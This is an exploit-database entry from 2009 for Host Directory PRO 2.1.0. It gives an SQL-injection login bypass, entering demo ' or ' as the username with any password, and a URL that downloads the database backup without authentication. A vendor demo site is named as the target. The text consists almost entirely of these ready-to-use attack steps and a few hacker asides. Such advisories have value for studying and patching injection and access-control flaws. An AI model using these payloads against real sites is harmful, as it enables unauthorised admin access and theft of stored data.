Host Directory PRO 2.1.0 Remote Database Backup Vulnerability

2009-06-04T00:00:00
ID 1337DAY-ID-5311
Type zdt
Reporter ZoRLu
Modified 2009-06-04T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =============================================================
Host Directory PRO 2.1.0 Remote Database Backup Vulnerability
=============================================================


[~] Host Directory Pro Bypass & Backup DB Disc. Multiple Vulns.
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu  
[~]
[~] Date: 28/03/09
[~]
[~] N0T: Herkes Hecker Olmus :S
[~]
[~] N0T: New Target Buffer Overflow : ) there is a little time xD
[~]
[~] N0T: Unutulduk mu ?
[~] -----------------------------------------------------------

script:

http://www.phphostdirectoryscript.com/

Bypass for demo:

username: demo ' or '

pass: ZoRLu or dont write anything

http://demo-host-directory-pro.phphostdirectoryscript.com/

Backup DB Disc. for demo:

http://demo-host-directory-pro.phphostdirectoryscript.com/admin/backup/db

[~]----------------------------------------------------------------------



#  0day.today [2018-02-19]  #